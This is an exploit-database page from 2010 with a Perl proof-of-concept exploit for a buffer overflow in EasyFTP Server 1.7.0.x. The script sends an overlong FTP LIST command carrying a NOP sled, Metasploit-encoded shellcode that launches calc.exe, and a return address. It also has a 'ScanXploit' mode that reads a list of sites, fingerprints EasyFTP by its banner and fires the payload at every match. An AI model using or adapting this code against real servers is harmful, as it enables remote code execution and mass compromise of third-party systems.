[dos / poc] - EasyFTP version 1.7.0.11 and version 1.7.0.2 C
Posted on 18 October 2010
<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'><html xmlns='http://www.w3.org/1999/xhtml'><head><meta http-equiv='Content-Type' content='text/html; charset=utf-8' /><meta http-equiv='Content-Language' content='en' /><title>EasyFTP version 1.7.0.11 and version 1.7.0.2 Crash PoC | Inj3ct0r - exploit database : vulnerability : 0day : shellcode</title><meta name='description' content='EasyFTP version 1.7.0.11 and version 1.7.0.2 Crash PoC by Inj3cti0n P4ck3t in dos / poc | Inj3ct0r - exploit database : vulnerability : 0day : shellcode' /><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon' /><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss' /><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></head><body><pre>====================================================== EasyFTP version 1.7.0.11 and version 1.7.0.2 Crash PoC ====================================================== sub banner { print q { ########################################################################################################## # # # [*] PoC EasyFTP 1.7.0.X Crash # # # # [*] Author: Inj3cti0n P4ck3t # # # # [*] e-mail: fer_henrick@hotmail.com # # # # [*] Date: 18/10/2010 # # # # [*] Greetz: C00l3r - fvox - _MLK_ - DD3str0y3r - s4r4d0 - Sh0rtKiller # # HADES - CODERED - FORAST - Colt7r - Z4i0n - M0nt3r # # Th1nk3r - Hackinho - r0t3d - elemento_pcx - Observing # # Believe - dr4k3 - Bl4ck9_f0x6 # # # # [*] Version Vulnerable: # # # # - EasyFTP Server 1.7.0.11 EN # # # # - EasyFTP Server 1.7.0.2 EN # # # # # # # # [*] System Operacional Tested: # # # # - Windows XP PACK 3 Brazilian # # # # # # # # # # - EasyFTP Server 1.7.0.2 => http://easyftpsvr.googlecode.com/files/easyftpsvr-1.7.0.2.zip # # # # - EasyFTP Server 1.7.0.11 => http://easyftpsvr.googlecode.com/files/easyftp-server-1.7.0.11-en.zip # # # # # ###############################Code Exploit ############################################################## } } #!usr/bin/perl use strict; use IO::Socket; use IO::Socket::INET; if (!$ARGV[0]) { &banner(); print q { Options: [1] - Test Exploit [2] - Test ScanXploit } } print " [+] Options: "; our $option = <stdin>; chomp ($option); if ($option == 1) { my $portTest ="21"; my $hostTest="127.0.0.1"; my $usuarioTest ="anonymous"; my $senhaTest = "adminadmin"; # Buffer needed -> 272 bytes # Metasploit Shellcode PoC - Calc.exe [ 228 bytes ] [ shikata_ga_nai - 1 iteration ] [ badchars x00x0ax2fx5c ] my $shellCodeTest = ("xdaxc0xd9x74x24xf4xbbxe6x9axc9x6dx5ax33xc9xb1x33x31x5ax18x83xeaxfcx03x5axf2x78x3cx91x12xf5xbfx6axe2x66x49x8fxd3xb4x2dxdbx41x09x25x89x69xe2x6bx3axfax86xa3x4dx4bx2cx92x60x4cx80x1ax2ex8ex82xe6x2dxc2x64xd6xfdx17x64x1fxe3xd7x34xc8x6fx45xa9x7dx2dx55xc8x51x39xe5xb2xd4xfex91x08xd6x2ex09x06x90xd6x22x40x01xe6xe7x92x7dxa1x8cx61xf5x30x44xb8xf6x02xa8x17xc9xaax25x69x0dx0cxd5x1cx65x6ex68x27xbex0cxb6xa2x23xb6x3dx14x80x46x92xc3x43x44x5fx87x0cx49x5ex44x27x75xebx6bxe8xffxafx4fx2cx5bx74xf1x75x01xdbx0ex65xedx84xaaxedx1cxd1xcdxafx4ax24x5fxcax32x26x5fxd5x14x4ex6ex5exfbx09x6fxb5xbfxe5x25x94x96x6dxe0x4cxabxf0x13xbbxe8x0cx90x4ex91xebx88x3ax94xb0x0exd6xe4xa9xfaxd8x5bxcax2exbbx3ax58xb2x12xd8xd8x51x6bx28"); my $nopsTest = ("x90" x 40); my $retornoTest = ("x10x3Bx88x00"); # MAGIC RET 00883B10 [ CALL EDI ] my $PayloadTest = $nopsTest . $shellCodeTest . $retornoTest; my $AutenticarTest = ("x55x53x45x52x20" . $usuarioTest . " " . "x50x41x53x53x20 " . $senhaTest . " " . "LIST " . $PayloadTest . " " ); my $socketTest = new IO::Socket::INET (PeerAddr => $hostTest,PeerPort => $portTest,Proto => 'tcp',); die " [x] Error: $! " unless $socketTest; print $socketTest $AutenticarTest; close($socketTest); sleep(2); our $soquetes = IO::Socket::INET->new("$hostTest:$portTest"); if($soquetes) { print " [-] Server no exploited "; } else { print " [+] Server Exploited "; } } ################################## ScanXploit ############################################################################################# if ($option == 2) { print " [+] Digite o nome da lista de sites, exampl,: lista.txt: "; our $lista = <stdin>; chomp ($lista); open( SITE, "< $lista" ) or die( " [-] Could not open file: $!" ); our @array = <SITE>; our $numero = $#array; for (our $i = 0; $i <= $numero; $i++) { our $Url = "$array[$i]"; if($Url !~ /http:///) { $Url = "http://$Url"; } our $Stop = index($Url,":"); our $Protocolo = substr($Url,0,$Stop); our $Start = index($Url,"//") + 2; our $Dominio = substr($Url,$Start); our $Stop = index($Dominio,"/"); our $Dominio = substr($Dominio,0,$Stop); our $Start = rindex($Url,"/") + 1; our $NomeArq = substr($Url,$Start); our $Compr_Url = length($Url); our $ponto = "$Dominio "; our @portas = "21"; foreach our $porta (@portas) { our $sock = IO::Socket::INET->new("$ponto:$porta"); if($sock) { our $remote = IO::Socket::INET -> new (Proto => "tcp", PeerAddr => $ponto, PeerPort => $porta, Timeout => "7"); our $line = <$remote>; if ($line =~ "BigFoolCat") { my $usuario ="anonymous"; my $senha = "adminadmin"; # Buffer needed -> 272 bytes # Metasploit Shellcode PoC - Calc.exe [ 228 bytes ] [ shikata_ga_nai - 1 iteration ] [ badchars x00x0ax2fx5c ] my $shellCode = ("xdaxc0xd9x74x24xf4xbbxe6x9axc9x6dx5ax33xc9xb1x33x31x5ax18x83xeaxfcx03x5axf2x78x3cx91x12xf5xbfx6axe2x66x49x8fxd3xb4x2dxdbx41x09x25x89x69xe2x6bx3axfax86xa3x4dx4bx2cx92x60x4cx80x1ax2ex8ex82xe6x2dxc2x64xd6xfdx17x64x1fxe3xd7x34xc8x6fx45xa9x7dx2dx55xc8x51x39xe5xb2xd4xfex91x08xd6x2ex09x06x90xd6x22x40x01xe6xe7x92x7dxa1x8cx61xf5x30x44xb8xf6x02xa8x17xc9xaax25x69x0dx0cxd5x1cx65x6ex68x27xbex0cxb6xa2x23xb6x3dx14x80x46x92xc3x43x44x5fx87x0cx49x5ex44x27x75xebx6bxe8xffxafx4fx2cx5bx74xf1x75x01xdbx0ex65xedx84xaaxedx1cxd1xcdxafx4ax24x5fxcax32x26x5fxd5x14x4ex6ex5exfbx09x6fxb5xbfxe5x25x94x96x6dxe0x4cxabxf0x13xbbxe8x0cx90x4ex91xebx88x3ax94xb0x0exd6xe4xa9xfaxd8x5bxcax2exbbx3ax58xb2x12xd8xd8x51x6bx28"); my $nops = ("x90" x 40); my $retorno = ("x10x3Bx88x00"); # MAGIC RET 00883B10 [ CALL EDI ] my $Payload = $nops . $shellCode . $retorno; my $Autenticar = ("x55x53x45x52x20" . $usuario . " " . "x50x41x53x53x20 " . $senha . " " . "LIST " . $Payload . " " ); our $socket = new IO::Socket::INET (PeerAddr => $ponto,PeerPort => $porta,Proto => 'tcp',); die "[x] Error: $! " unless $socket; print $socket $Autenticar; close($socket); } sleep(2); our $soquete = IO::Socket::INET->new("$ponto:$porta"); if($soquete) { print " [-] Server no exploited "; } else { print " [+] Server Exploited "; } } } } print " [+] Servers tested: $numero "; } if ($option != 1 && $option != 2 ) { print " [+] Option invalid "; } exit; # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-10-18]</pre></body></html>
